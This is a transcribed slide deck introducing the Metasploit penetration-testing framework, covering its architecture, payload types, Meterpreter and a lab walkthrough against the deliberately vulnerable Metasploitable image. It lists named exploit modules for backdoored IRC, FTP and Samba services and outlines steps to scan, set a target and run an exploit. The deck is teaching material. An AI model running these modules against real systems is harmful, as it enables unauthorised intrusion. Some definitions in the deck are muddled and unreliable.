Metasploit
Download as PPTX, PDF4 likes4,819 views
The Metasploit Framework is an open-source penetration testing tool that includes the largest database of public exploits and an organized architecture with various components like modules and libraries. It facilitates the exploitation of vulnerabilities in systems through payloads, which can be standalone or use stagers, and includes advanced tools like Meterpreter for exploitation. Additionally, Metasploitable serves as a practice platform with known vulnerabilities for training in penetration testing.
Metasploit
- 1. METASPLOIT METASPLOIT FRAMEWORK IS A OPEN SOURCE PENETRATION TOOL USED FOR DEVELOPING AND EXECUTING EXPLOIT CODE AGAINST A REMOTE TARGET MACHINE IT, METASPLOIT FRAME WORK HAS THE WORLD’S LARGEST DATABASE OF PUBLIC, TESTED EXPLOITS.
- 3. METASPLOIT ARCHITECTURE - FILESYSTEM AND LIBRARIES
- 4. METASPLOIT ARCHITECTURE - FILESYSTEM AND LIBRARIES Metasploit Filesystem The MSF filesystem is laid out in an intuitive manner and is organized by directory. • data: editable files used by Metasploit • documentation: provides documentation for the framework • external: source code and third-party libraries • lib: the ‘meat’ of the framework code base • modules: the actual MSF modules • plugins: plugins that can be loaded at run-time • scripts: Meterpreter and other scripts • tools: various useful command-line utilities Metasploit Libraries The MSF libraries help us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads.
- 5. METASPLOIT ARCHITECTURE - MODULES AND LOCATIONS Exploits •Defined as modules that use payloads •An exploit without a payload is an Auxiliary module Payloads, Encoders, Nops •Payloads consist of code that runs remotely •Encoders ensure that payloads make it to their destination •Nops keep the payload sizes consistent Primary Module Tree •Located under /usr/share/metasploit-framework/modules/ User-Specified Module Tree •Located under ~/.msf4/modules/ •This location is ideal for private module sets
- 6. METASPLOIT ARCHITECTURE - MODULES AND LOCATIONS Loading Additional Module Trees Metasploit gives you the freedom to load modules either at runtime or after msfconsole has already been started. Pass the -m option when running msfconsole to load at runtime:
- 7. METASPLOIT ARCHITECTURE - MODULES AND LOCATIONS If you need to load additional modules after runtime, use the Metasploit loadpath command from within msfconsole:
- 8. METASPLOIT ARCHITECTURE Metasploit Object Model In the Metasploit Framework, all modules are Ruby classes. Modules inherit from the type-specific class The type-specific class inherits from the Msf::Module class There is a shared common API between modules Payloads are slightly different. Payloads are created at runtime from various components Glue together stagers with stages
- 9. METASPLOIT FUNDAMENTALS Msfconsole interface The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all- in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface. Launching msfconsole The -q option removes the launch banner by starting msfconsole in quiet mode.
- 10. METASPLOIT FUNDAMENTALS Active Exploits Active exploits will exploit a specific host, run until completion, and then exit. Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered. You can force an active module to the background by passing ‘-j’ to the exploit comma Passive Exploits Passive exploits wait for incoming hosts and exploit them as they connect. Passive exploits almost always focus on clients such as web browsers, FTP clients, etc. They can also be used in conjunction with email exploits, waiting for connections. Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.
- 11. IN SHORT Vulnerability -A weakness which allows an attacker to break into or compromise a system’s security. Like the main gate of house with a weak lock (can be easily opened) , a glass window of house(can be easily broken) etc can be the vulnerabilities in the systems which make it easy for an attacker to break into. Exploit – Code which allows an attacker to take advantage of a vulnerability system. The set of different keys which he can try one by one to open the lock , the hammer with him which he can use to break the glass window etc can be the exploits. Payload- Actual code which runs on the system after exploitation Now Finally after exploiting the vulnerability and breaking in , he can have different things to do. He can Steal Money destroy the things or just can give a look and come back.. Deciding this is what we mean by setting the Payload.
- 12. METASPLOIT FUNDAMENTALS Payload Mean? A payload in metapsloit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. Whether or not a payload is staged, is represented by ‘/’ in the payload name. For example, “windows/shell_bind_tcp” is a single payload with no stage, whereas “windows/shell/bind_tcp” consists of a stager (bind_tcp) and a stage (shell). Singles Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.
- 13. METASPLOIT FUNDAMENTALS Stagers Stagers setup a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one when necessary. Stages Stages are payload components that are downloaded by Stagers modules. The various payload stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.
- 14. METASPLOIT FUNDAMENTALS What is Meterpreter? Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more. Metepreter was originally written by skape for Metasploit 2.x, common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.
- 15. 1. SELECT A RIGHT EXPLOIT AND THEN SET THE TARGET. 2.VERIFY THE EXPLOIT OPTIONS TO DETERMINE WHETHER THE TARGET SYSTEM IS VULNERABLE TO THE EXPLOIT. 3.SELECT A PAYLOAD 4.EXECUTE THE EXPLOIT. AFTER GATHERING INFORMATION ABOUT TARGET SYSTEM
- 16. Exploiting linux
- 17. Metasploitable METASPLOITABLE IS A PURPOSEFULLY VULNERABLE UBUNTU 8.04 IMAGE THAT IS RUNNING SEVERAL UNPATCHED SERVICES. METASPLOITABLE IS A GREAT PLATFORM TO PRACTICE AND DEVELOP YOUR PENETRATION TESTING SKILLS ON LINUX.
- 20. Finding version of samba in linux machine using auxilary/scanner module
- 21. Exploiting linux
- 22. Reverse connection established! -Session created.
- 23. Other exploits you can use:- • USE EXPLOIT/UNIX/IRC/UNREAL_IRCD_3281_BACKDOOR • USE EXPLOIT/UNIX/FTP/VSFTPD_234_BACKDOOR • USE EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT • USE EXPLOT/MULTI/HTTP/PHP_CGI_ARG_INJECTION • USE EXPLOIT/LINUX/MISC/DRB_REMOTE_CODEEXEC
- 24. Exploits information • USE EXPLOIT/UNIX/IRC/UNREAL_IRCD_3281_BACKDOOR :- THIS MODULE EXPLOITS MALICIOUS BACKDOOR THAT WAS PRESENT IN BETWEEN 2009 & 2010 (IT WAS PATCHED AFTER THAT). • USE EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT :- IT EXPLOITS VULNERABLITY OF SAMBA VERSION IN 3.0.20 RC3 & 3.0.25RC3 FOR EXPLOITING SAMBA (IN LINUX) USING METASPLOIT :- 1) USE AUXILARY/SCANNER/SMB/SMB_VERSION -- FOR FINDING VERSION OF SAMBA 2) USE AUXILARY/SCANNER/SMB/SMB_ENUMSHARES -- SHOWS SHARING OPTIONS 2) USE AUXILARY/MULTI/SAMBA/USERMAP_SCRIPT – RUNING EXPLOIT, SET RHOST & RPORT & RUN EXLOIT COMMAND.
- 25. Thank you